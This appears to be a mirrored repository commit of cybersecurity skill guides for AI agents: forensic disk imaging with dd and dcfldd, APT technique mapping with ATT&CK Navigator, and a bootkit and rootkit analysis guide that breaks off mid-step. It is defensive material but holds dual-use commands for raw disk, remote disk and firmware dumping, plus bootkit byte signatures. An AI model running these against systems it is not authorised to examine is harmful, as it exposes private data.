mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-06-10 13:14:55 +03:00
Initial commit - 611 cybersecurity skills across all subdomains
+14
@@ -0,0 +1,14 @@
.claude/
.claude-plugin/
teams/
node_modules/
__pycache__/
*.py[cod]
*.bin
*.pt
*.safetensors
*.gguf
*.onnx
.DS_Store
Thumbs.db
*.swp
@@ -0,0 +1,45 @@
# Anthropic Cybersecurity Skills

An open-source database of 600+ cybersecurity skills for AI agents, practitioners, and security teams.

## Structure

```
skills/cybersecurity/{skill-name}/
├── SKILL.md              # Skill definition with YAML frontmatter
├── references/
│   ├── standards.md      # Real standard numbers, CVE refs, NIST/MITRE links
│   └── workflows.md      # Deep technical procedure reference
├── scripts/
│   └── process.py        # Real practitioner helper script
└── assets/
    └── template.md       # Real filled-in checklist/report template
```

## Domains Covered

- Web Application Security
- Network Security
- Penetration Testing
- Red Teaming
- Digital Forensics & Incident Response (DFIR)
- Malware Analysis
- Threat Intelligence
- Cloud Security
- Container Security
- Identity & Access Management
- Cryptography
- Vulnerability Management
- Compliance & Governance
- Zero Trust Architecture
- OT/ICS Security
- DevSecOps
- And more...

## Usage

Each `SKILL.md` follows the agentskills.io open standard with YAML frontmatter and a structured Markdown body.
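
As a rough illustration of that layout, the sketch below splits a `SKILL.md` string into its frontmatter fields and Markdown body. It is a minimal stdlib-only sketch, not part of this repository: `split_frontmatter` and `SAMPLE` are hypothetical names, and the parser only understands flat `key: value` lines, so a real consumer would more likely use a proper YAML library.

```python
def split_frontmatter(text: str) -> tuple[dict[str, str], str]:
    """Split a SKILL.md string into (frontmatter fields, Markdown body).

    Assumption: only flat `key: value` lines are handled; folded or nested
    YAML values are skipped rather than parsed.
    """
    lines = text.splitlines()
    if not lines or lines[0].strip() != "---":
        return {}, text  # no frontmatter at all
    fields: dict[str, str] = {}
    for i, line in enumerate(lines[1:], start=1):
        if line.strip() == "---":  # closing delimiter
            return fields, "\n".join(lines[i + 1:])
        if ":" in line and not line.startswith((" ", "\t")):
            key, _, value = line.partition(":")
            fields[key.strip()] = value.strip().strip('"')
    return {}, text  # no closing delimiter: treat as plain Markdown


# Hypothetical sample mirroring the frontmatter used by the skills in this commit
SAMPLE = """---
name: acquiring-disk-image-with-dd-and-dcfldd
domain: cybersecurity
version: "1.0"
---
# Acquiring Disk Image with dd and dcfldd
"""

fields, body = split_frontmatter(SAMPLE)
print(fields["name"], fields["version"])
```

An agent or indexer could use the `name`, `domain`, and `tags` fields to select a skill before reading the body.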

## License

MIT
@@ -0,0 +1,230 @@
---
name: acquiring-disk-image-with-dd-and-dcfldd
description: Create forensically sound bit-for-bit disk images using dd and dcfldd while preserving evidence integrity through hash verification.
domain: cybersecurity
subdomain: digital-forensics
tags: [forensics, disk-imaging, evidence-acquisition, dd, dcfldd, hash-verification]
version: "1.0"
author: mahipal
license: MIT
---

# Acquiring Disk Image with dd and dcfldd

## When to Use
- When you need to create a forensic copy of a suspect drive for investigation
- During incident response, when disk evidence must be preserved before analysis
- When law enforcement or legal proceedings require a verified bit-for-bit copy
- Before performing any destructive analysis on a storage device
- When acquiring images from physical drives, USB devices, or memory cards

## Prerequisites
- Linux-based forensic workstation (SIFT, Kali, or any Linux distro)
- `dd` (pre-installed on virtually every Linux distribution) or `dcfldd` (enhanced forensic version)
- Write-blocker hardware or software write-blocking configured
- Destination drive with more free space than the source drive's capacity
- Root/sudo privileges on the forensic workstation
- SHA-256 or MD5 hashing utilities (`sha256sum`, `md5sum`)

## Workflow

### Step 1: Identify the Target Device and Enable Write Protection

```bash
# List all connected block devices to identify the target
lsblk -o NAME,SIZE,TYPE,MOUNTPOINT,MODEL

# Verify the device details
fdisk -l /dev/sdb

# Enable software write-blocking (if no hardware blocker)
blockdev --setro /dev/sdb

# Verify read-only status
blockdev --getro /dev/sdb
# Output: 1 (means read-only is enabled)

# Alternatively, use udev rules for persistent write-blocking.
# The sysfs "ro" attribute is not writable, so the rule runs blockdev when the device appears.
echo 'ACTION=="add", SUBSYSTEM=="block", ATTRS{serial}=="WD-WCAV5H861234", RUN+="/sbin/blockdev --setro /dev/%k"' > /etc/udev/rules.d/99-writeblock.rules
udevadm control --reload-rules
```

### Step 2: Prepare the Destination and Document the Source

```bash
# Create case directory structure
mkdir -p /cases/case-2024-001/{images,hashes,logs,notes}

# Document source drive information
hdparm -I /dev/sdb > /cases/case-2024-001/notes/source_drive_info.txt

# Record the serial number and model
smartctl -i /dev/sdb >> /cases/case-2024-001/notes/source_drive_info.txt

# Pre-hash the source device
sha256sum /dev/sdb | tee /cases/case-2024-001/hashes/source_hash_before.txt
```

### Step 3: Acquire the Image Using dd

```bash
# Basic dd acquisition with progress and error handling
dd if=/dev/sdb of=/cases/case-2024-001/images/evidence.dd \
   bs=4096 \
   conv=noerror,sync \
   status=progress 2>&1 | tee /cases/case-2024-001/logs/dd_acquisition.log

# For compressed images to save space
dd if=/dev/sdb bs=4096 conv=noerror,sync status=progress | \
   gzip -c > /cases/case-2024-001/images/evidence.dd.gz

# Using dd with a specific count for partial acquisition
dd if=/dev/sdb of=/cases/case-2024-001/images/first_1gb.dd \
   bs=1M count=1024 status=progress
```

### Step 4: Acquire Using dcfldd (Preferred Forensic Method)

```bash
# Install dcfldd if not present
apt-get install dcfldd

# Acquire image with built-in hashing and windowed hash logging
dcfldd if=/dev/sdb \
   of=/cases/case-2024-001/images/evidence.dd \
   hash=sha256,md5 \
   hashwindow=1G \
   hashlog=/cases/case-2024-001/hashes/acquisition_hashes.txt \
   bs=4096 \
   conv=noerror,sync \
   errlog=/cases/case-2024-001/logs/dcfldd_errors.log

# Split large images into manageable segments
# (split= and splitformat= only apply to an of= that follows them)
dcfldd if=/dev/sdb \
   hash=sha256 \
   hashlog=/cases/case-2024-001/hashes/split_hashes.txt \
   bs=4096 \
   split=2G \
   splitformat=aa \
   of=/cases/case-2024-001/images/evidence.dd

# Verification pass: compare the source against the acquired image
# (run separately from acquisition, without of=, so the image is never reopened for writing)
dcfldd if=/dev/sdb \
   vf=/cases/case-2024-001/images/evidence.dd \
   verifylog=/cases/case-2024-001/logs/verify.log
```

### Step 5: Verify Image Integrity

```bash
# Hash the acquired image
sha256sum /cases/case-2024-001/images/evidence.dd | \
   tee /cases/case-2024-001/hashes/image_hash.txt

# Compare source and image hashes
diff <(sha256sum /dev/sdb | awk '{print $1}') \
     <(sha256sum /cases/case-2024-001/images/evidence.dd | awk '{print $1}')

# If using split images, verify each segment
sha256sum /cases/case-2024-001/images/evidence.dd.* | \
   tee /cases/case-2024-001/hashes/split_image_hashes.txt

# Re-hash source to confirm no changes occurred
sha256sum /dev/sdb | tee /cases/case-2024-001/hashes/source_hash_after.txt
diff /cases/case-2024-001/hashes/source_hash_before.txt \
     /cases/case-2024-001/hashes/source_hash_after.txt
```
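
The same source-versus-image comparison can be scripted when the result needs to feed a report. The sketch below is one possible approach using only the Python standard library; `sha256_of` and `verify_image` are hypothetical helper names, and the demo hashes two temporary files that stand in for `/dev/sdb` and `evidence.dd`.

```python
import hashlib
import os
import tempfile


def sha256_of(path, chunk_size=1024 * 1024):
    """Return the SHA-256 hex digest of a file or block device, read in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_image(source_path, image_path):
    """Hash both paths and report whether the digests are identical."""
    source_hash = sha256_of(source_path)
    image_hash = sha256_of(image_path)
    return {"source": source_hash, "image": image_hash,
            "match": source_hash == image_hash}


# Demo: two temporary files stand in for the source device and the image
with tempfile.TemporaryDirectory() as workdir:
    source = os.path.join(workdir, "source.bin")
    image = os.path.join(workdir, "evidence.dd")
    for path in (source, image):
        with open(path, "wb") as handle:
            handle.write(b"\x00" * 8192 + b"evidence")
    result = verify_image(source, image)
    print("Hash Match:", "YES" if result["match"] else "NO")
```

Reading in fixed-size chunks keeps memory use constant regardless of image size, which matters for multi-hundred-gigabyte evidence files.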

### Step 6: Document the Acquisition Process

```bash
# Generate acquisition report
# (unquoted EOF so that $(date ...) is expanded when the report is written)
cat << EOF > /cases/case-2024-001/notes/acquisition_report.txt
DISK IMAGE ACQUISITION REPORT
==============================
Case Number: 2024-001
Date/Time: $(date -u +"%Y-%m-%d %H:%M:%S UTC")
Examiner: [Name]

Source Device: /dev/sdb
Model: [from hdparm output]
Serial: [from hdparm output]
Size: [from fdisk output]

Acquisition Tool: dcfldd v1.9.1
Block Size: 4096
Write Blocker: [Hardware/Software model]

Image File: evidence.dd
Image Hash (SHA-256): [from hash file]
Source Hash (SHA-256): [from hash file]
Hash Match: YES/NO

Errors During Acquisition: [from error log]
EOF

# Compress logs for archival
tar -czf /cases/case-2024-001/acquisition_package.tar.gz \
    /cases/case-2024-001/hashes/ \
    /cases/case-2024-001/logs/ \
    /cases/case-2024-001/notes/
```

## Key Concepts

| Concept | Description |
|---------|-------------|
| Bit-for-bit copy | Exact replica of source including unallocated space and slack space |
| Write blocker | Hardware or software mechanism preventing writes to evidence media |
| Hash verification | Cryptographic hash comparing source and image to prove integrity |
| Block size (bs) | Transfer chunk size affecting speed; 4096 or 64K typical for forensics |
| conv=noerror,sync | Continue on read errors and pad with zeros to maintain offset alignment |
| Chain of custody | Documented trail proving evidence has not been tampered with |
| Split imaging | Breaking large images into smaller files for storage and transport |
| Raw/dd format | Bit-for-bit image format without metadata container overhead |
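
To make the `conv=noerror,sync` row concrete, the following sketch simulates the behaviour in Python: unreadable blocks are replaced by zeros so that every later block stays at its original offset. It is an illustration only and not how `dd` is implemented; `image_with_padding` and `flaky_read` are hypothetical names, and the "device" is an in-memory list.

```python
def image_with_padding(read_block, total_blocks, block_size=4096):
    """Copy blocks in order, zero-filling unreadable or short blocks.

    Mirrors the effect of conv=noerror,sync: keep going after a read error
    and pad each input block to block_size so offsets stay aligned.
    """
    image = bytearray()
    bad_blocks = []
    for index in range(total_blocks):
        try:
            data = read_block(index)
        except OSError:
            data = b""
            bad_blocks.append(index)
        image += data.ljust(block_size, b"\x00")
    return bytes(image), bad_blocks


# Simulated 4-block source in which block 2 cannot be read
BLOCK = 4096
blocks = [bytes([n + 1]) * BLOCK for n in range(4)]


def flaky_read(index):
    if index == 2:
        raise OSError("simulated unreadable sector")
    return blocks[index]


image, bad = image_with_padding(flaky_read, total_blocks=4, block_size=BLOCK)
print("unreadable blocks:", bad)
print("block 3 still at its original offset:", image[3 * BLOCK:4 * BLOCK] == blocks[3])
```

Without the padding step, everything after the bad block would shift toward the start of the image and file system structures would no longer line up with their recorded offsets.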

## Tools & Systems

| Tool | Purpose |
|------|---------|
| dd | Standard Unix disk duplication utility for raw imaging |
| dcfldd | DoD Computer Forensics Laboratory enhanced version of dd with hashing |
| dc3dd | Another forensic dd variant from the DoD Cyber Crime Center |
| sha256sum | SHA-256 hash calculation for integrity verification |
| blockdev | Linux command to set block device read-only mode |
| hdparm | Drive identification and parameter reporting |
| smartctl | S.M.A.R.T. data retrieval for drive health and identification |
| lsblk | Block device enumeration and identification |

## Common Scenarios

**Scenario 1: Acquiring a Suspect Laptop Hard Drive**
Connect the drive through a Tableau T35u hardware write-blocker and identify it as `/dev/sdb`. Acquire with dcfldd using SHA-256 hashing, split the image into 4GB segments for DVD archival, verify that the hashes match, and document the process in the case notes.

**Scenario 2: Imaging a USB Flash Drive from a Compromised Workstation**
Enable software write-blocking with `blockdev --setro`, then acquire with dcfldd using dual MD5 and SHA-256 hashing. The image is small enough for a single file; verify it and store it on an encrypted case drive.

**Scenario 3: Remote Acquisition Over Network**
Pipe dd through netcat or ssh for remote acquisition: `ssh root@remote "dd if=/dev/sda bs=4096" | dd of=remote_image.dd bs=4096`. Hash both ends independently to verify transfer integrity.

**Scenario 4: Acquiring from a Failing Drive**
Use `ddrescue` first to recover readable sectors, then use dd with `conv=noerror,sync` so that any remaining gaps are filled with zeros. Document which sectors were unreadable in the error log.

## Output Format

```
Acquisition Summary:
  Source:         /dev/sdb (500GB Western Digital WD5000AAKX)
  Destination:    /cases/case-2024-001/images/evidence.dd
  Tool:           dcfldd 1.9.1
  Block Size:     4096 bytes
  Duration:       2h 15m 32s
  Bytes Copied:   500,107,862,016
  Errors:         0 bad sectors
  Source SHA-256: a3f2b8c9d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1
  Image SHA-256:  a3f2b8c9d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1
  Verification:   PASSED - Hashes match
```
@@ -0,0 +1,257 @@
---
name: analyzing-apt-group-with-mitre-navigator
description: Analyze advanced persistent threat (APT) group techniques using MITRE ATT&CK Navigator to create layered heatmaps of adversary TTPs for detection gap analysis and threat-informed defense.
domain: cybersecurity
subdomain: threat-intelligence
tags: [mitre-attack, navigator, apt, threat-actor, ttp-analysis, heatmap, detection-gap, threat-intelligence]
version: "1.0"
author: mahipal
license: MIT
---
# Analyzing APT Group with MITRE ATT&CK Navigator

## Overview

MITRE ATT&CK Navigator is a web-based tool for annotating and exploring ATT&CK matrices, enabling analysts to visualize threat actor technique coverage, compare multiple APT groups, identify detection gaps, and build threat-informed defense strategies. This skill covers querying ATT&CK data programmatically, mapping APT group TTPs to Navigator layers, creating multi-layer overlays for gap analysis, and generating actionable intelligence reports for detection engineering teams.

## Prerequisites

- Python 3.9+ with `attackcti`, `mitreattack-python`, `stix2`, `requests` libraries
- ATT&CK Navigator (https://mitre-attack.github.io/attack-navigator/) or local deployment
- Understanding of ATT&CK Enterprise matrix: 14 Tactics, 200+ Techniques, Sub-techniques
- Access to threat intelligence reports or MISP/OpenCTI for threat actor data
- Familiarity with STIX 2.1 Intrusion Set and Attack Pattern objects

## Key Concepts

### ATT&CK Navigator Layers

Navigator layers are JSON files that annotate ATT&CK techniques with scores, colors, comments, and metadata. Each layer can represent a single APT group's technique usage, a detection capability map, or a combined overlay. Layer version 4.5 supports enterprise-attack, mobile-attack, and ics-attack domains with filtering by platform (Windows, Linux, macOS, Cloud, Azure AD, Office 365, SaaS).

### APT Group Profiles in ATT&CK

ATT&CK catalogs over 140 threat groups with documented technique usage. Each group profile includes aliases, targeted sectors, associated campaigns, software used, and technique mappings with procedure-level detail. Groups are identified by G-codes (e.g., G0016 for APT29, G0007 for APT28, G0032 for Lazarus Group).

### Multi-Layer Analysis

The Navigator supports loading multiple layers simultaneously, allowing analysts to overlay threat actor TTPs against detection coverage to identify gaps, compare multiple APT groups to find common techniques worth prioritizing, and track technique coverage changes over time.

## Practical Steps

### Step 1: Query ATT&CK Data for APT Group

```python
from attackcti import attack_client
import json

lift = attack_client()

# Get all threat groups
groups = lift.get_groups()
print(f"Total ATT&CK groups: {len(groups)}")

# Find APT29 (Cozy Bear / Midnight Blizzard)
apt29 = next((g for g in groups if g.get('name') == 'APT29'), None)
if apt29:
    print(f"Group: {apt29['name']}")
    print(f"Aliases: {apt29.get('aliases', [])}")
    print(f"Description: {apt29.get('description', '')[:300]}")

# Get techniques used by APT29 (G0016).
# attackcti resolves relationships from the group's STIX object, so pass the object itself.
techniques = lift.get_techniques_used_by_group(apt29) if apt29 else []
print(f"APT29 uses {len(techniques)} techniques")

technique_map = {}
for tech in techniques:
    tech_id = ""
    for ref in tech.get("external_references", []):
        if ref.get("source_name") == "mitre-attack":
            tech_id = ref.get("external_id", "")
            break
    if tech_id:
        tactics = [p.get("phase_name", "") for p in tech.get("kill_chain_phases", [])]
        technique_map[tech_id] = {
            "name": tech.get("name", ""),
            "tactics": tactics,
            "description": tech.get("description", "")[:500],
            "platforms": tech.get("x_mitre_platforms", []),
            "data_sources": tech.get("x_mitre_data_sources", []),
        }
```

### Step 2: Generate Navigator Layer JSON

```python
def create_navigator_layer(group_name, technique_map, color="#ff6666"):
    techniques_list = []
    for tech_id, info in technique_map.items():
        for tactic in info["tactics"]:
            techniques_list.append({
                "techniqueID": tech_id,
                "tactic": tactic,
                "color": color,
                "comment": info["name"],
                "enabled": True,
                "score": 100,
                "metadata": [
                    {"name": "group", "value": group_name},
                    {"name": "platforms", "value": ", ".join(info["platforms"])},
                ],
            })

    layer = {
        "name": f"{group_name} TTP Coverage",
        "versions": {"attack": "16.1", "navigator": "5.1.0", "layer": "4.5"},
        "domain": "enterprise-attack",
        "description": f"Techniques attributed to {group_name}",
        "filters": {
            "platforms": ["Linux", "macOS", "Windows", "Cloud",
                          "Azure AD", "Office 365", "SaaS", "Google Workspace"]
        },
        "sorting": 0,
        "layout": {
            "layout": "side", "aggregateFunction": "average",
            "showID": True, "showName": True,
            "showAggregateScores": False, "countUnscored": False,
        },
        "hideDisabled": False,
        "techniques": techniques_list,
        "gradient": {"colors": ["#ffffff", color], "minValue": 0, "maxValue": 100},
        "legendItems": [
            {"label": f"Used by {group_name}", "color": color},
            {"label": "Not observed", "color": "#ffffff"},
        ],
        "showTacticRowBackground": True,
        "tacticRowBackground": "#dddddd",
        "selectTechniquesAcrossTactics": True,
        "selectSubtechniquesWithParent": False,
        "selectVisibleTechniques": False,
    }
    return layer

layer = create_navigator_layer("APT29", technique_map)
with open("apt29_layer.json", "w") as f:
    json.dump(layer, f, indent=2)
print("[+] Layer saved: apt29_layer.json")
```

### Step 3: Compare Multiple APT Groups

```python
groups_to_compare = {"G0016": "APT29", "G0007": "APT28", "G0032": "Lazarus Group"}
group_techniques = {}

def attack_id(stix_object):
    """Return the ATT&CK ID (e.g. G0016 or T1059) from an object's external references."""
    for ref in stix_object.get("external_references", []):
        if ref.get("source_name") == "mitre-attack":
            return ref.get("external_id", "")
    return ""

# Index the groups fetched in Step 1 by ATT&CK ID; attackcti expects the
# group's STIX object rather than the bare G-code.
groups_by_id = {attack_id(g): g for g in groups}

for gid, gname in groups_to_compare.items():
    group = groups_by_id.get(gid)
    techs = lift.get_techniques_used_by_group(group) if group else []
    group_techniques[gname] = {attack_id(t) for t in techs} - {""}

common_to_all = set.intersection(*group_techniques.values())
print(f"Techniques common to all groups: {len(common_to_all)}")
for tid in sorted(common_to_all):
    print(f"  {tid}")

for gname, techs in group_techniques.items():
    others = set.union(*[t for n, t in group_techniques.items() if n != gname])
    unique = techs - others
    print(f"\nUnique to {gname}: {len(unique)} techniques")
```
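
Strict intersection can be too narrow when more groups are compared, since a technique used by most but not all groups drops out. One way to relax it, sketched below under the assumption that the input has the same shape as `group_techniques` above, is to rank techniques by how many groups use them. `rank_shared_techniques` and the sample data are hypothetical and do not reflect real ATT&CK mappings.

```python
from collections import Counter


def rank_shared_techniques(group_techniques, min_groups=2):
    """Rank technique IDs by the number of groups that use them.

    Returns (technique_id, group_count) pairs, most widely shared first,
    keeping only techniques used by at least min_groups groups.
    """
    counts = Counter(tid for techs in group_techniques.values() for tid in techs)
    ranked = [(tid, n) for tid, n in counts.items() if n >= min_groups]
    return sorted(ranked, key=lambda item: (-item[1], item[0]))


# Hypothetical sample data, not taken from ATT&CK
sample = {
    "Group A": {"T1059.001", "T1566.001", "T1078"},
    "Group B": {"T1059.001", "T1078", "T1027"},
    "Group C": {"T1059.001", "T1105"},
}

for tid, n in rank_shared_techniques(sample):
    print(f"{tid}: used by {n} of {len(sample)} groups")
```

Techniques near the top of the ranking are reasonable first candidates for detection engineering because a single detection covers several adversaries.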

### Step 4: Detection Gap Analysis with Layer Overlay

```python
# Define your current detection capabilities
detected_techniques = {
    "T1059", "T1059.001", "T1071", "T1071.001", "T1566", "T1566.001",
    "T1547", "T1547.001", "T1053", "T1053.005", "T1078", "T1027",
}

actor_techniques = set(technique_map.keys())
covered = actor_techniques.intersection(detected_techniques)
gaps = actor_techniques - detected_techniques
total = len(actor_techniques) or 1  # avoid division by zero if no techniques were returned

print("=== Detection Gap Analysis for APT29 ===")
print(f"Actor techniques: {len(actor_techniques)}")
print(f"Detected: {len(covered)} ({len(covered)/total*100:.0f}%)")
print(f"Gaps: {len(gaps)} ({len(gaps)/total*100:.0f}%)")

# Create gap layer (red = undetected, green = detected)
gap_techniques = []
for tech_id in actor_techniques:
    info = technique_map.get(tech_id, {})
    for tactic in info.get("tactics", [""]):
        color = "#66ff66" if tech_id in detected_techniques else "#ff3333"
        gap_techniques.append({
            "techniqueID": tech_id,
            "tactic": tactic,
            "color": color,
            "comment": f"{'DETECTED' if tech_id in detected_techniques else 'GAP'}: {info.get('name', '')}",
            "enabled": True,
            "score": 100 if tech_id in detected_techniques else 0,
        })

gap_layer = {
    "name": "APT29 Detection Gap Analysis",
    "versions": {"attack": "16.1", "navigator": "5.1.0", "layer": "4.5"},
    "domain": "enterprise-attack",
    "description": "Green = detected, Red = gap",
    "techniques": gap_techniques,
    "gradient": {"colors": ["#ff3333", "#66ff66"], "minValue": 0, "maxValue": 100},
    "legendItems": [
        {"label": "Detected", "color": "#66ff66"},
        {"label": "Detection Gap", "color": "#ff3333"},
    ],
}
with open("apt29_gap_layer.json", "w") as f:
    json.dump(gap_layer, f, indent=2)
```

### Step 5: Tactic Breakdown Analysis

```python
from collections import defaultdict

tactic_breakdown = defaultdict(list)
for tech_id, info in technique_map.items():
    for tactic in info["tactics"]:
        tactic_breakdown[tactic].append({"id": tech_id, "name": info["name"]})

tactic_order = [
    "reconnaissance", "resource-development", "initial-access",
    "execution", "persistence", "privilege-escalation",
    "defense-evasion", "credential-access", "discovery",
    "lateral-movement", "collection", "command-and-control",
    "exfiltration", "impact",
]

print("\n=== APT29 Tactic Breakdown ===")
for tactic in tactic_order:
    techs = tactic_breakdown.get(tactic, [])
    if techs:
        print(f"\n{tactic.upper()} ({len(techs)} techniques):")
        for t in techs:
            print(f"  {t['id']}: {t['name']}")
```

## Validation Criteria

- ATT&CK data queried successfully via TAXII server
- APT group mapped to all documented techniques with procedure examples
- Navigator layer JSON validates and renders correctly in ATT&CK Navigator
- Multi-layer overlay shows threat actor vs. detection coverage
- Detection gap analysis identifies unmonitored techniques with data source recommendations
- Cross-group comparison reveals shared and unique TTPs
- Output is actionable for detection engineering prioritization
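
A quick structural check can catch malformed layers before they are loaded into the Navigator. The sketch below is a lightweight sanity check and not the official layer schema: `check_layer` is a hypothetical helper, and the set of required keys and the technique ID pattern are assumptions based on the layers built in the steps above.

```python
import re

# Assumption: ATT&CK technique IDs look like T1059 or T1059.001
TECHNIQUE_ID = re.compile(r"^T\d{4}(\.\d{3})?$")
# Assumption: these top-level keys are treated as mandatory for this check
REQUIRED_KEYS = ("name", "versions", "domain", "techniques")


def check_layer(layer):
    """Return a list of human-readable problems found in a layer dict."""
    problems = []
    for key in REQUIRED_KEYS:
        if key not in layer:
            problems.append(f"missing top-level key: {key}")
    for index, entry in enumerate(layer.get("techniques", [])):
        tid = entry.get("techniqueID", "")
        if not TECHNIQUE_ID.match(tid):
            problems.append(f"techniques[{index}]: bad techniqueID {tid!r}")
        score = entry.get("score")
        if score is not None and not isinstance(score, (int, float)):
            problems.append(f"techniques[{index}]: score must be numeric")
    return problems


good = {
    "name": "APT29 TTP Coverage",
    "versions": {"layer": "4.5"},
    "domain": "enterprise-attack",
    "techniques": [{"techniqueID": "T1059.001", "score": 100}],
}
bad = {"name": "broken", "techniques": [{"techniqueID": "1059", "score": "high"}]}

print(check_layer(good))
print(len(check_layer(bad)), "problems found in the broken layer")
```

Rendering the file in the Navigator itself remains the real validation step; this check only filters out obvious mistakes earlier in a pipeline.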

## References

- [MITRE ATT&CK Navigator](https://mitre-attack.github.io/attack-navigator/)
- [ATT&CK Groups](https://attack.mitre.org/groups/)
- [attackcti Python Library](https://github.com/OTRF/ATTACK-Python-Client)
- [Navigator Layer Format v4.5](https://github.com/mitre-attack/attack-navigator/blob/master/layers/LAYERFORMATv4_5.md)
- [CISA Best Practices for MITRE ATT&CK Mapping](https://www.cisa.gov/sites/default/files/2023-01/Best%20Practices%20for%20MITRE%20ATTCK%20Mapping.pdf)
- [Picus: Leverage MITRE ATT&CK for Threat Intelligence](https://www.picussecurity.com/how-to-leverage-the-mitre-attack-framework-for-threat-intelligence)
@@ -0,0 +1,344 @@
---
name: analyzing-bootkit-and-rootkit-samples
description: >
  Analyzes bootkit and advanced rootkit malware that infects the Master Boot Record (MBR),
  Volume Boot Record (VBR), or UEFI firmware to gain persistence below the operating system.
  Covers boot sector analysis, UEFI module inspection, and anti-rootkit detection techniques.
  Activates for requests involving bootkit analysis, MBR malware investigation, UEFI
  persistence analysis, or pre-OS malware detection.
domain: cybersecurity
subdomain: malware-analysis
tags: [malware, bootkit, rootkit, UEFI, MBR-analysis]
version: 1.0.0
author: mahipal
license: MIT
---

# Analyzing Bootkit and Rootkit Samples

## When to Use

- A system shows signs of compromise that persist through OS reinstallation
- Antivirus and EDR are unable to detect malware despite clear evidence of compromise
- UEFI Secure Boot has been disabled or shows integrity violations
- Memory forensics reveals rootkit behavior (hidden processes, hooked system calls)
- Investigating nation-state level threats known to deploy bootkits (APT28, APT41, Equation Group)

**Do not use** for standard user-mode malware; bootkits and rootkits operate at a fundamentally different level requiring specialized analysis techniques.

## Prerequisites

- Disk imaging tools (dd, FTK Imager) for acquiring MBR/VBR sectors
- UEFITool for UEFI firmware volume analysis and module extraction
- chipsec for hardware-level firmware security assessment
- Ghidra with x86 real-mode and 16-bit support for MBR code analysis
- Volatility 3 for kernel-level rootkit artifact detection
- Bootable Linux live USB for offline system analysis

## Workflow

### Step 1: Acquire Boot Sectors and Firmware

Extract MBR, VBR, and UEFI firmware for offline analysis:

```bash
# Acquire MBR (first 512 bytes of disk)
dd if=/dev/sda of=mbr.bin bs=512 count=1

# Acquire first track (usually contains bootkit code beyond MBR)
dd if=/dev/sda of=first_track.bin bs=512 count=63

# Acquire VBR (Volume Boot Record - first sector of partition)
dd if=/dev/sda1 of=vbr.bin bs=512 count=1

# Acquire UEFI System Partition (mounted read-only to avoid altering evidence)
mkdir -p /mnt/efi /analysis/efi_backup
mount -o ro /dev/sda1 /mnt/efi
cp -r /mnt/efi/EFI /analysis/efi_backup/

# Dump UEFI firmware (requires chipsec or flashrom)
# Using chipsec:
python chipsec_util.py spi dump firmware.rom

# Using flashrom:
flashrom -p internal -r firmware.rom

# Record a hash of the firmware dump for later integrity checks
sha256sum firmware.rom
```

### Step 2: Analyze MBR/VBR for Bootkit Code

Examine boot sector code for malicious modifications:

```bash
# Disassemble MBR code (16-bit real mode)
ndisasm -b16 mbr.bin > mbr_disasm.txt

# Compare MBR with known-good Windows boot sectors
# Standard NTFS VBR begins with: EB 52 90 (JMP +0x52, NOP) followed by "NTFS"
# Standard Windows 10 MBR: 33 C0 8E D0 BC 00 7C (XOR AX,AX; MOV SS,AX; MOV SP,7C00h)

python3 << 'PYEOF'
with open("mbr.bin", "rb") as f:
    mbr = f.read()

# Check MBR signature (bytes 510-511 should be 55 AA)
if mbr[510:512] == b'\x55\xAA':
    print("[*] Valid MBR signature (0x55AA)")
else:
    print("[!] Invalid MBR signature")

# Check for known bootkit signatures and known-clean prologues
bootkit_sigs = {
    b'\xE8\x00\x00\x5E\x81\xEE': "TDL4/Alureon bootkit",
    b'\xFA\x33\xC0\x8E\xD0\xBC\x00\x7C\x8B\xF4\x50\x07': "Standard Windows MBR (clean)",
    b'\xEB\x52\x90\x4E\x54\x46\x53': "Standard NTFS VBR (clean)",
}

for sig, name in bootkit_sigs.items():
    if sig in mbr:
        print(f"[{'!' if 'clean' not in name else '*'}] Signature match: {name}")

# Check partition table entries
print("\nPartition Table:")
for i in range(4):
    offset = 446 + (i * 16)
    entry = mbr[offset:offset+16]
    if entry != b'\x00' * 16:
        boot_flag = "Active" if entry[0] == 0x80 else "Inactive"
        part_type = entry[4]
        start_lba = int.from_bytes(entry[8:12], 'little')
        size_lba = int.from_bytes(entry[12:16], 'little')
        print(f"  Partition {i+1}: Type=0x{part_type:02X} {boot_flag} Start=LBA {start_lba} Size={size_lba} sectors")
PYEOF
```
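
Signature matching only flags families that are already known. A complementary check, sketched below, hashes the 440-byte bootstrap code area and compares it with digests taken from trusted reference systems. The baseline dictionary here is a hypothetical placeholder built from a synthetic sector; real baselines would come from clean installs of the same OS build. `boot_code_digest` and `compare_to_baseline` are illustrative names.

```python
import hashlib

BOOT_CODE_SIZE = 440  # bootstrap code area; disk signature and partition table follow


def boot_code_digest(mbr: bytes) -> str:
    """SHA-256 of the bootstrap code only, so per-disk fields do not affect it."""
    if len(mbr) < 512:
        raise ValueError("expected a full 512-byte sector")
    return hashlib.sha256(mbr[:BOOT_CODE_SIZE]).hexdigest()


def compare_to_baseline(mbr: bytes, baseline: dict):
    """Return (digest, label); label is None when the code matches no baseline."""
    digest = boot_code_digest(mbr)
    return digest, baseline.get(digest)


# Synthetic 512-byte sector: code area, disk signature, reserved, partition table, 55 AA
code = b"\x33\xC0\x8E\xD0\xBC\x00\x7C".ljust(BOOT_CODE_SIZE, b"\x00")
clean_mbr = code + b"\x12\x34\x56\x78" + b"\x00\x00" + bytes(64) + b"\x55\xAA"
tampered_mbr = b"\xE8" + clean_mbr[1:]

# Hypothetical baseline; populate from known-good systems in practice
baseline = {boot_code_digest(clean_mbr): "reference image (hypothetical)"}

for label, sector in (("clean", clean_mbr), ("tampered", tampered_mbr)):
    digest, match = compare_to_baseline(sector, baseline)
    print(f"{label}: {digest[:16]}... -> {match or 'UNKNOWN boot code'}")
```

Restricting the hash to the code area means two disks with different partition layouts still produce the same digest when their boot code is identical.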

### Step 3: Analyze UEFI Firmware for Implants

Inspect UEFI firmware volumes for unauthorized modules:

```bash
# Extract UEFI firmware components with UEFITool
# GUI: Open firmware.rom -> Inspect firmware volumes
# CLI:
UEFIExtract firmware.rom all

# List all DXE drivers (most common target for UEFI implants)
find firmware.rom.dump -name "*.efi" -exec file {} \;

# Compare against known-good firmware module list
# Each UEFI module has a GUID - compare against vendor baseline

# Verify Secure Boot configuration
